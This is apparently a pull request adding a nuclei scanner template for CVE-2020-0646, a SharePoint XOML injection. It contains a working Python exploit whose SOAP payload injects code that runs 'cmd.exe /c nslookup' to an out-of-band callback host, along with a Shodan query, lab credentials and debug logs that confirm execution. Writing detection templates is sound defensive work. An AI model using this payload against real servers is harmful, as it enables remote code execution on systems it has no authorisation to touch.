### PR TITLE
add CVE-2020-0646

### DIFF
--- a/code/cves/2020/CVE-2020-0646.yaml
+++ b/code/cves/2020/CVE-2020-0646.yaml
@@ -32,7 +32,7 @@ variables:
 code:
   - engine:
       - py
-      - python3
+      - python3 #pip install requests-ntlm (required)
 
     source: |
       import os

--- a/code/cves/2020/CVE-2020-0646.yaml
+++ b/code/cves/2020/CVE-2020-0646.yaml
@@ -25,7 +25,7 @@ info:
     product: .net_framework
     shodan-query:
       - server: ms .net remoting
-  tags: cve,cve2020,dotnet,sharepoint,microsoft,rce
+  tags: cve,cve2020,dotnet_framework,sharepoint,microsoft,rce
 variables:
   OAST: "{{interactsh-url}}"
 code:

--- a/code/cves/2020/CVE-2020-0646.yaml
+++ b/code/cves/2020/CVE-2020-0646.yaml
@@ -94,13 +94,11 @@ code:
       if __name__ == '__main__':
           main()
 
-    matchers-condition: and
     matchers:
-      - type: word
-        part: interactsh_protocol
-        words:
-          - "dns"
-
       - type: dsl
         dsl:
-          - "contains_all(response,'<ValidateWorkflowMarkupAndCreateSupportObjectsResponse','\\\'foo\\\' validation failed:','\\\'Activities\\\' collection for Activity \\\'MyWorkflow\\\'')"
+          - 'contains(interactsh_protocol, "dns")'
+          - 'contains(body, "ValidateWorkflowMarkupAndCreateSupportObjectsResponse")'
+          - 'contains(content_type, "text/xml")'
+          - 'status_code == 200'
+        condition: and

--- a/code/cves/2020/CVE-2020-0646.yaml
+++ b/code/cves/2020/CVE-2020-0646.yaml
@@ -5,11 +5,7 @@ info:
   author: pszyszkowski
   severity: critical
   description: |
-    Microsoft .NET Framework contains a remote code execution caused by improper input validation, letting remote attackers execute arbitrary code, exploit requires sending malicious input to the system.
-    This template exploits a vulnerability within SharePoint and its .NET backend that allows an attacker to execute commands using specially crafted XOML data sent to SharePoint via the Workflows functionality.
-  remediation: |
-    Fixed in security update published Jan 14, 2020:
-    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2020-0646
+    A remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly, aka '.NET Framework Remote Code Execution Injection Vulnerability'.
   reference:
     - https://www.cve.org/CVERecord?id=CVE-2020-0646
     - https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2020-0646
@@ -19,19 +15,25 @@ info:
     cvss-score: 9.8
     cve-id: CVE-2020-0646
     cwe-id: CWE-91
+    epss-score: 0.92775
+    epss-percentile: 0.99747
+    cpe: cpe:2.3:a:microsoft:.net_framework:3.0:sp2:*:*:*:*:*:*
   metadata:
     verified: true
     vendor: microsoft
     product: .net_framework
-    shodan-query:
-      - server: ms .net remoting
-  tags: cve,cve2020,dotnet_framework,sharepoint,microsoft,rce
+    shodan-query: 'server:"ms .net remoting"'
+    max-request: 1
+  tags: cve,cve2020,net-framework,sharepoint,microsoft,packetstorm,rce,kev
+
 variables:
   OAST: "{{interactsh-url}}"
+
 code:
   - engine:
       - py
       - python3
+
     source: |
       import os
       import urllib3
@@ -94,6 +96,7 @@ code:
 
       if __name__ == '__main__':
           main()
+
     matchers:
       - type: word
         part: interactsh_protocol

--- a/code/cves/2020/CVE-2020-0646.yaml
+++ b/code/cves/2020/CVE-2020-0646.yaml
@@ -1,0 +1,101 @@
+id: CVE-2020-0646
+
+info:
+  name: Microsoft .NET Framework - Remote Code Execution
+  author: pszyszkowski
+  severity: critical
+  description: |
+    Microsoft .NET Framework contains a remote code execution caused by improper input validation, letting remote attackers execute arbitrary code, exploit requires sending malicious input to the system.
+    This template exploits a vulnerability within SharePoint and its .NET backend that allows an attacker to execute commands using specially crafted XOML data sent to SharePoint via the Workflows functionality.
+  remediation: |
+    Fixed in security update published Jan 14, 2020:
+    https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2020-0646
+  reference:
+    - https://www.cve.org/CVERecord?id=CVE-2020-0646
+    - https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2020-0646
+    - http://packetstormsecurity.com/files/156930/SharePoint-Workflows-XOML-Injection.html
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2020-0646
+    cwe-id: CWE-91
+  metadata:
+    verified: true
+    vendor: microsoft
+    product: .net_framework
+    shodan-query:
+      - server: ms .net remoting
+  tags: cve,cve2020,dotnet,sharepoint,microsoft,rce
+variables:
+  OAST: "{{interactsh-url}}"
+code:
+  - engine:
+      - py
+      - python3
+    source: |
+      import os
+      import urllib3
+      import requests
+
+      urllib3.disable_warnings()
+      default_ua = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'
+      paths = [os.getenv('Path'), '/_vti_bin/webpartpages.asmx']
+      host = os.getenv('RootURL')
+      domain = os.getenv('OAST')
+      user = os.getenv('username')
+      pswd = os.getenv('password')
+      data = f'''<?xml version="1.0" encoding="utf-8"?>
+      <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+      <soap:Body>
+          <ValidateWorkflowMarkupAndCreateSupportObjects xmlns="http://microsoft.com/sharepoint/webpartpages">
+          <workflowMarkupText>
+              <![CDATA[
+              <SequentialWorkflowActivity x:Class="MyWorkflow" x:Name="foobar" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/workflow">
+                  <CallExternalMethodActivity x:Name="foo" MethodName='test1' InterfaceType='System.String);}}Object/**/test2=System.Diagnostics.Process.Start("cmd.exe", "/c nslookup {domain}");private/**/void/**/foobar(){{//' />
+              </SequentialWorkflowActivity>
+              ]]>
+          </workflowMarkupText>
+          <rulesText></rulesText>
+          <configBlob></configBlob>
+          <flag>2</flag>
+          </ValidateWorkflowMarkupAndCreateSupportObjects>
+      </soap:Body>
+      </soap:Envelope>
+      '''
+
+      def main():
+          if (user != None) and (pswd != None):
+              ntlm = True
+          else:
+              ntlm = False
+          if host is None:
+              print("missing target. You must specify -u <url>")
+              exit(1)
+
+          if ntlm:
+              from requests_ntlm import HttpNtlmAuth
+              _auth = HttpNtlmAuth(user, pswd)
+          else:
+              _auth = None
+          _headers = {
+              'User-Agent': default_ua,
+              'Content-Type': 'text/xml'
+          }
+          for item in paths:
+              url = os.getenv('RootURL') + item
+              res = requests.post(url, data, auth=_auth, verify=None, headers=_headers)
+
+              if res.status_code != 200:
+                  print('%s failed [%s]' % (item, res.status_code))
+                  continue
+              else:
+                  print('%s succeded (%s)' % (res.url, res.status_code))
+                  break
+
+      if __name__ == '__main__':
+          main()
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"

--- a/code/cves/2020/CVE-2020-0646.yaml
+++ b/code/cves/2020/CVE-2020-0646.yaml
@@ -24,7 +24,7 @@ info:
     product: .net_framework
     shodan-query: 'server:"ms .net remoting"'
     max-request: 1
-  tags: cve,cve2020,net-framework,sharepoint,microsoft,packetstorm,rce,kev
+  tags: cve,cve2020,net-framework,sharepoint,microsoft,packetstorm,rce,kev,oast
 
 variables:
   OAST: "{{interactsh-url}}"
@@ -38,7 +38,6 @@ code:
       import os
       import urllib3
       import requests
-
       urllib3.disable_warnings()
       default_ua = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'
       paths = [os.getenv('Path'), '/_vti_bin/webpartpages.asmx']
@@ -64,7 +63,6 @@ code:
       </soap:Body>
       </soap:Envelope>
       '''
-
       def main():
           if (user != None) and (pswd != None):
               ntlm = True
@@ -73,7 +71,6 @@ code:
           if host is None:
               print("missing target. You must specify -u <url>")
               exit(1)
-
           if ntlm:
               from requests_ntlm import HttpNtlmAuth
               _auth = HttpNtlmAuth(user, pswd)
@@ -86,19 +83,24 @@ code:
           for item in paths:
               url = os.getenv('RootURL') + item
               res = requests.post(url, data, auth=_auth, verify=None, headers=_headers)
-
               if res.status_code != 200:
-                  print('%s failed [%s]' % (item, res.status_code))
                   continue
               else:
-                  print('%s succeded (%s)' % (res.url, res.status_code))
+                  print(f"HTTP/1.1 {res.status_code} {res.reason}")
+                  for key, value in res.headers.items():
+                      print(f"{key}: {value}")
+                  print(f"\n{res.text}")
                   break
-
       if __name__ == '__main__':
           main()
 
+    matchers-condition: and
     matchers:
       - type: word
         part: interactsh_protocol
         words:
           - "dns"
+
+      - type: dsl
+        dsl:
+          - "contains_all(response,'<ValidateWorkflowMarkupAndCreateSupportObjectsResponse','\\\'foo\\\' validation failed:','\\\'Activities\\\' collection for Activity \\\'MyWorkflow\\\'')"

--- a/code/cves/2020/CVE-2020-0646.yaml
+++ b/code/cves/2020/CVE-2020-0646.yaml
@@ -32,7 +32,7 @@ variables:
 code:
   - engine:
       - py
-      - python3 #pip install requests-ntlm (required)
+      - python3 #pip install requests_ntlm (required)
 
     source: |
       import os


### PR DESCRIPTION
### Template / PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

- Added CVE-2020-0646
- References:
  - http://packetstormsecurity.com/files/156930/SharePoint-Workflows-XOML-Injection.html
### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO


#### Additional Details (leave it blank if not applicable)

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

I've uploaded vhdx from hyper-v to https://github.com/pszyszkowski/nuclei-templates/releases/tag/CVE-2019-0604 (it's vulnerable to CVE-2020-0646 and CVE-2019-0604)
It includes SharePoint 2016 and dependencies (AD, SQL Server, etc.)
Configured username/password: `Administrator:SharePointLab1`
Set them both as env variables when running template
```
USERNAME=Administrator PASSWORD=SharePointLab1 nuclei -u ...
```
Debug:
```
nuclei -u http://172.24.29.253/ -code -t .\code\cves\2020\CVE-2020-0646.yaml -debug

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.5

                projectdiscovery.io

[INF] Current nuclei version: v3.4.5 (latest)
[INF] Current nuclei-templates version: v10.2.3 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 105
[INF] Templates loaded for current scan: 1
[INF] Executing 1 signed templates from pszyszkowski
[INF] Targets loaded for current scan: 1
[INF] Using Interactsh Server: oast.live
[DBG] [CVE-2020-0646] Dumped Executed Source Code for input/stdin: 'http://172.24.29.253/'
---------------
Source Code:
---------------
import os
import urllib3
import requests

urllib3.disable_warnings()
default_ua = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'
paths = [os.getenv('Path'), '/_vti_bin/webpartpages.asmx']
host = os.getenv('RootURL')
domain = os.getenv('OAST')
user = os.getenv('username')
pswd = os.getenv('password')
data = f'''<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
    <ValidateWorkflowMarkupAndCreateSupportObjects xmlns="http://microsoft.com/sharepoint/webpartpages">
    <workflowMarkupText>
        <![CDATA[
        <SequentialWorkflowActivity x:Class="MyWorkflow" x:Name="foobar" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/workflow">
            <CallExternalMethodActivity x:Name="foo" MethodName='test1' InterfaceType='System.String);}}Object/**/test2=System.Diagnostics.Process.Start("cmd.exe", "/c nslookup {domain}");private/**/void/**/foobar(){{//' />
        </SequentialWorkflowActivity>
        ]]>
    </workflowMarkupText>
    <rulesText></rulesText>
    <configBlob></configBlob>
    <flag>2</flag>
    </ValidateWorkflowMarkupAndCreateSupportObjects>
</soap:Body>
</soap:Envelope>
'''

def main():
    if (user != None) and (pswd != None):
        ntlm = True
    else:
        ntlm = False
    if host is None:
        print("missing target. You must specify -u <url>")
        exit(1)

    if ntlm:
        from requests_ntlm import HttpNtlmAuth
        _auth = HttpNtlmAuth(user, pswd)
    else:
        _auth = None
    _headers = {
        'User-Agent': default_ua,
        'Content-Type': 'text/xml'
    }
    for item in paths:
        url = os.getenv('RootURL') + item
        res = requests.post(url, data, auth=_auth, verify=None, headers=_headers)

        if res.status_code != 200:
            print('%s failed [%s]' % (item, res.status_code))
            continue
        else:
            print('%s succeded (%s)' % (res.url, res.status_code))
            break

if __name__ == '__main__':
    main()


---------------
Command Executed:
---------------
C:\Users\pszys\AppData\Local\Microsoft\WindowsApps\python3.exe C:\Users\pszys\AppData\Local\Temp\nuclei-tmp-4104465684\2384525578

---------------
Command Output:
---------------
/ failed [401]
http://172.24.29.253/_vti_bin/webpartpages.asmx succeded (200)

[WRN] Command Output here is stdout+sterr, in response variables they are seperate (use -v -svd flags for more details)
[DBG] [CVE-2020-0646] Dumped Code Execution for http://172.24.29.253/

/ failed [401]
http://172.24.29.253/_vti_bin/webpartpages.asmx succeded (200)

[d1avrjndilk3m93usejg7ej1o4z4wbcy6] Received DNS interaction from 172.69.49.14 at 2025-06-21 00:33:23
------------
DNS Request
------------

;; opcode: QUERY, status: NOERROR, id: 56083
;; flags:; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version 0; flags: do; udp: 1452

;; QUESTION SECTION:
;d1avrjndilk3m93usejg7ej1o4z4wbcy6.oast.live.   IN       A



------------
DNS Response
------------

;; opcode: QUERY, status: NOERROR, id: 56083
;; flags: qr aa; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2

;; QUESTION SECTION:
;d1avrjndilk3m93usejg7ej1o4z4wbcy6.oast.live.   IN       A

;; ANSWER SECTION:
d1avrjndilk3m93usejg7ej1o4z4wbcy6.oast.live.    3600    IN      A       178.128.210.172

;; AUTHORITY SECTION:
d1avrjndilk3m93usejg7ej1o4z4wbcy6.oast.live.    3600    IN      NS      ns1.oast.live.
d1avrjndilk3m93usejg7ej1o4z4wbcy6.oast.live.    3600    IN      NS      ns2.oast.live.

;; ADDITIONAL SECTION:
ns1.oast.live.  3600    IN      A       178.128.210.172
ns2.oast.live.  3600    IN      A       178.128.210.172


[CVE-2020-0646:word-1] [code] [critical] http://172.24.29.253/
[INF] Scan completed in 10.3977804s. 1 matches found.
```

/claim #12210

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)